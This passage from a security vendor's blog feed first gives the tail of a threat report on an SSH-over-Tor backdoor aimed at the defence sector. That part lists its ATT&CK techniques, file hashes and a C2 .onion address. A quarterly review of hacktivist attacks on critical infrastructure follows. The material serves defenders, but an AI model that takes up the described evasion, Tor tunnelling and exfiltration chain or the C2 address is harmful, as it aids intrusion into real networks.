| Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Uses nested archives, randomized filenames, and obfuscated PowerShell to evade detection |
| Defense Evasion (TA0005) | Indicator Removal: File Deletion (T1070.004) | Executes from %AppData% with hidden folders to minimize forensic footprint |
| Credential Access (TA0006) | Unsecured Credentials: Private Keys (T1552.004) | Deploys pre-generated RSA private keys for SSH authentication embedded in the malware archive |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Uses HTTPS via curl to register the victim with the attacker's C2 infrastructure |
| Command and Control (TA0011) | Encrypted Channel: Asymmetric Cryptography (T1573.002) | Establishes SSH connections using RSA key-based authentication for secure C2 |
| Command and Control (TA0011) | Proxy: Multi-hop Proxy (T1090.003) | Routes all C2 traffic through the Tor network using a SOCKS5 proxy for anonymization |
| Command and Control (TA0011) | Protocol Tunneling (T1572) | Tunnels SSH, RDP, SMB, and SFTP through Tor hidden service .onion addresses |
| Command and Control (TA0011) | Non-Application Layer Protocol (T1095) | Uses the obfs4 pluggable transport to disguise Tor traffic as benign communications |
| Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | Exfiltrates data via the SFTP subsystem routed through the Tor hidden service |
| Exfiltration (TA0010) | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (T1048.002) | Uses SSH/SFTP for encrypted data exfiltration, separate from the primary C2 channel |
| Lateral Movement (TA0008) | Remote Services: SMB/Windows Admin Shares (T1021.002) | Exposes SMB port 445 through Tor for network share access and lateral movement |
| Lateral Movement (TA0008) | Remote Services: Remote Desktop Protocol (T1021.001) | Provides RDP access on port 3389 through Tor for interactive system control |

Indicators of Compromise

| Indicator | Indicator Type | Description |
|---|---|---|
| 30a5df544f4a838f9c7ce34377ed2668e0ba22cc39d1e26b303781153808a2c4 | SHA-256 | ZIP archive |
| 99ec6437f74eec19e33c1a0b4ac8826bcc44848f87cd1a1c2b379fae9df62de9 | SHA-256 | LNK file |
| 7269b4bc6b3036e5a2f8c2a7908a439202cee9c8b9e50b67c786c39f2500df8f | SHA-256 | PowerShell script |
| 5d3a6340691840d1a87bfab543faec77b4a9d457991dd938834de820a99685f7 | SHA-256 | ТЛГ на убытие на переподготовку.pdf (decoy document) |
| 08db5bb9812f49f9394fd724b9196c7dc2f61b5ba1644da65db95ab6e430c92b | SHA-256 | obfs4proxy.exe, renamed confluence.exe (legitimate tool, not malware) |
| a0eed0e1ef8fc4129f630e6f68c29c357c717df0fe352961e92e7f8c93e5371b | SHA-256 | SFTP binary, renamed ebay.exe (legitimate tool, not malware) |
| 710e8c96875d6a3c1b4f08f4b2094c800658551065b20ef3fd450b210dcc7b9a | SHA-256 | OpenSSH for Windows sshd.exe, renamed githubdesktop.exe (legitimate tool, not malware) |
| 7946a2275c1c232eebed6ead95ea4723285950175586db1f95354b910b0a3cce | SHA-256 | pinterest.exe (legitimate tool, not malware) |
| yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd.onion | Domain | Tor hidden service (.onion) address |

References

https://cert.gov.ua/article/6281701

The post Weaponized Military Documents Deliver Advanced SSH-Tor Backdoor to Defense Sector appeared first on Cyble.

Hacktivist Attacks on Critical Infrastructure Surge: Cyble Report
https://cyble.com/blog/hacktivist-attacks-critical-infrastructure-q3-2025/ (Fri, 31 Oct 2025 12:33:47 +0000)

Hacktivist attacks on critical infrastructure grew throughout the third quarter of 2025, and by September, accounted for 25% of all hacktivist attacks. 

If that trend continues, it would represent a near-doubling of attacks on industrial control systems (ICS) from the second quarter of 2025. 

Cyble’s assessment of the hacktivism threat landscape in the third quarter of 2025 found that while DDoS attacks and website defacements continue to make up a majority of hacktivist activity, their share continues to decline as ideologically motivated threat groups expand their focus to include ICS attacks, data breaches, unauthorized access, and even ransomware.

Z-Pentest emerged in the fall of 2024 as the hacktivist group most focused on ICS targets, but in the third quarter it was joined by Dark Engine (aka Infrastructure Destruction Squad), Golden Falcon Team, INTEID, S4uD1Pwnz, and Sector 16.

Russia-aligned hacktivist groups INTEID, Dark Engine, Sector 16, and Z-Pentest were responsible for the majority of recent ICS attacks, primarily targeting the Energy & Utilities, Manufacturing, and Agriculture sectors across Europe. Their campaigns focused on disrupting industrial and critical infrastructure in Ukraine and in EU and NATO member states.

Some of Z-Pentest’s targets in the third quarter included a water utility HMI system in the U.S. and an agricultural biotechnology SCADA system in Taiwan. The group often posts videos of its members tampering with critical infrastructure control panels, as they did in the recent U.S. and Taiwan incidents. 

Critical infrastructure attacks by hacktivist groups have continued into the fourth quarter, and the Canadian Centre for Cyber Security just this week warned of ICS attacks in that country. 

Most Active Hacktivist Groups and Targets 

NoName057(16) retained the largest share of observable operations despite attempts by law enforcement to disrupt the threat group. Z-Pentest and Hezi Rash increased their proportional footprint, together representing a meaningful slice of activity compared with the start of the quarter. Several once-prominent actors contracted sharply: Special Forces of the Electronic Army, Jokeir_07x, and BL4CK CYB3R all lost ground, their relative contributions dwindling to a marginal portion. A handful of emerging groups — including Red Wolf Cyber Team and INTEID — strengthened their visibility and now constitute a notable minority. 

The chart below shows the most active hacktivist groups in the third quarter. 

Among the noteworthy incidents in the quarter, the Belarusian group Cyber Partisans BY, together with Silent Crow, claimed to have compromised the IT infrastructure of Russian state airline Aeroflot, exploiting alleged Tier-0 access for nearly a year. The attackers reportedly gained control over significant IT assets, disrupting key systems and exfiltrating more than 22TB of data. Russia’s General Prosecutor confirmed a cyberattack that caused major flight delays and cancellations at Sheremetyevo Airport. The groups also claimed the destruction of around 7,000 servers. 

The Ukrainian Cyber Alliance and BO Team announced a breach of a Russian manufacturer involved in military drone production. Leaked materials purportedly included engineering blueprints, VMware snapshots, storage mappings, and CCTV footage from UAV assembly facilities. The attackers claimed they wiped servers, backups, and cloud environments after data exfiltration. 

Among the hacktivist groups moving into ransomware, Team BD Cyber Ninja’s “Black Hat” division claimed to have released a custom ransomware tool that they advertise as “100% FUD” (fully undetectable), able to encrypt Windows systems and lock the disk at the Master Boot Record (MBR), rendering affected hosts non-bootable. The group’s claims remain unverified. 

The hacktivist collective Liwa’ Muhammad announced in July the release of its Ransomware-as-a-Service (RaaS) offering with a double-extortion model, named ‘BQTLock’ (BaqiyatLock). The group claims multiple RaaS variants for encrypting Linux, Windows, and macOS systems.

Among the sectors targeted during the third quarter, government and law-enforcement targets continued to dominate, but their share declined markedly, dropping from nearly one-third of all incidents in July to about one-quarter by September. Energy and Utilities grew proportionally, expanding their share by almost half, while Telecommunications and Media each recorded moderate proportional gains. 

Below is a chart showing sectors targeted by hacktivist groups in the third quarter. 

Hacktivism and Geopolitical Conflict 

Geopolitical conflict remains a primary motive in hacktivist campaigns. 

Hacktivist campaigns in Southeast Asia illustrated how border tensions rapidly translated into coordinated digital offensives. The Thailand–Cambodia border conflict triggered intense cross-border cyber aggression, with nationalist groups leveraging DDoS attacks, website defacements, and data leaks to reinforce territorial narratives. However, as regional hostilities eased, the focus shifted away from Southeast Asia toward new flashpoints. 

In South Asia, hacktivism remained highly reactive to political symbolism and historical grievances. The India–Pakistan and India–Bangladesh rivalries once again shaped cyberspace, with both sides conducting retaliatory and ideologically framed attacks. These operations were amplified by disinformation efforts seeking to portray cyber incidents as extensions of insurgent activity.

The Middle East continued to experience a digital spillover from ongoing physical conflicts. The Israel–Hamas war has fueled a surge in politically motivated cyber activity. In response to Israel’s blockade and military operations, pro-Palestinian and Islamist-aligned hacktivists intensified campaigns against Egypt, Israel, and their regional allies. The Houthi–Saudi Arabian conflict added to regional instability, with hacktivist groups aligned with both Saudi and Houthi interests conducting cyber operations in support of their respective sides. 

In Europe, the dismantling of NoName057(16) infrastructure under Operation Eastwood triggered retaliatory activity by pro-Russian networks, reaffirming the resilience and adaptability of state-aligned hacktivist ecosystems. Simultaneously, the Russia–Ukraine war and broader confrontation with NATO drove sustained cyber aggression across Eastern and Northern Europe, particularly in the Baltic States and Finland. 

A notable trend emerged in the Philippines, where domestic political unrest and corruption scandals invited a surge in cyberattacks against state institutions. This rise underscored the increasing use of hacktivism as a tool of internal dissent. 

Most Targeted Countries by Hacktivists 

Ukraine was the leading target of hacktivist campaigns in the third quarter, primarily due to the ongoing Russia–Ukraine war and associated proxy cyber activity from pro-Russian groups and their international allies. 

In contrast, Thailand and India—previously among the most targeted states—experienced a sharp contraction in hacktivist operations. The downturn aligned with the easing of border hostilities between Thailand and Cambodia and the fading of nationalist cyber campaigns surrounding India’s Independence Day. 

Meanwhile, the Philippines emerged unexpectedly as a high-profile target following domestic unrest and allegations of government corruption, marking a regional pivot within Southeast Asia. 

Saudi Arabia and Finland saw renewed exposure, each linked to broader geopolitical developments—Saudi Arabia’s involvement in regional conflicts, especially with the Houthi militia in Yemen, and Finland’s integration into NATO’s security framework. Egypt and the UAE continued to attract low but persistent activity tied to Middle Eastern crises, particularly the Gaza–Egypt border tensions. The United States maintained a steady, symbolic presence as a target, while Morocco and Italy registered modest increases consistent with wider European and North African instability.

Conclusion 

The growing sophistication of the leading hacktivist groups is by now an established trend and will likely continue to spread to other groups over time. 

That means that exposed environments in critical sectors can expect further compromise by hacktivist groups, advanced persistent threats (APTs), and others known to target critical infrastructure. 

Critical assets should be isolated from the Internet wherever possible, and operational technology (OT) and IT networks should be segmented and protected with Zero Trust access controls. Vulnerability management, along with network and endpoint monitoring and hardening, is another critical cybersecurity best practice.  

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. Get a free external threat profile for your organization today.  

The post Hacktivist Attacks on Critical Infrastructure Surge: Cyble Report appeared first on Cyble.
